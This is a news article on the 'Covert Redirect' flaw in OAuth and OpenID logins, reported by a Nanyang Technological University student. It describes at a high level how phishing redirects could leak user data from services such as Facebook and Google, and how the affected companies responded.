Security flaw found in Oauth and OpenID affects Google, Microsoft and Facebook

A major vulnerability has been discovered in the Oauth and OpenID services designed to protect user credentials. The login tools create tokens allowing users to login to websites including Facebook, Google, and Linkedin and those owned by Microsoft, using centralised credentials, without the websites having direct access to user names or passwords.

It was just discovered by Wang Jing, a Ph.D student at Nanyang Technological University. Called the "Covert Redirect" flaw, the vulnerability allows hackers to trick users into authorizing an app or site using malicious phishing links. For example, if you visit a site and click a button to log in with Google or Facebook, you'll see the familiar authorization popup. If you authorize the login, your personal data can be sent to the hacker instead of to the site. This can include your email address, contact lists, birthday, and more. The vulnerability could also redirect you to a different look-alike website.

Perhaps the scariest thing is the Covert Redirect flaw doesn't use a fake domain that might be spotted by more savvy surfers, but instead uses the real site address that you're trying to log into. So it's very hard to detect.

The information could be accessed by miscreants in such a way includes email addresses, birth dates, contact lists and even credentials to access the entire account. In fact Covert Redirect keeps sending the victim back to compromised links even after the initial request (in this case Facebook authorisation) is performed. This opens them up to more attacks.

Wang says he has already informed Facebook about the flaw, and the company said that it “understood the risks associated with OAuth 2.0,” and that fixing this bug would not be accomplished in the short term. According to Wang, Facebook, Google, LinkedIn, Yahoo, Microsoft, PayPal, QQ, Weibo, Taobao, VK.com, Mail.Ru, GitHub are the sites affected so far. The student also reported the flaw to Google, LinkedIn and Microsoft.

Google said that the problem was being tracked, LinkedIn is preparing an announcement to deal with this bud. Microsoft has already investigated the bug and has decided that the vulnerability existed on the domain of a third-party, and not on Microsoft sites.

Users who wish to avoid any potential loss of data should be careful about clicking links that immediately ask you to log in to Facebook or Google. Closing the tab immediately should prevent any redirection attacks.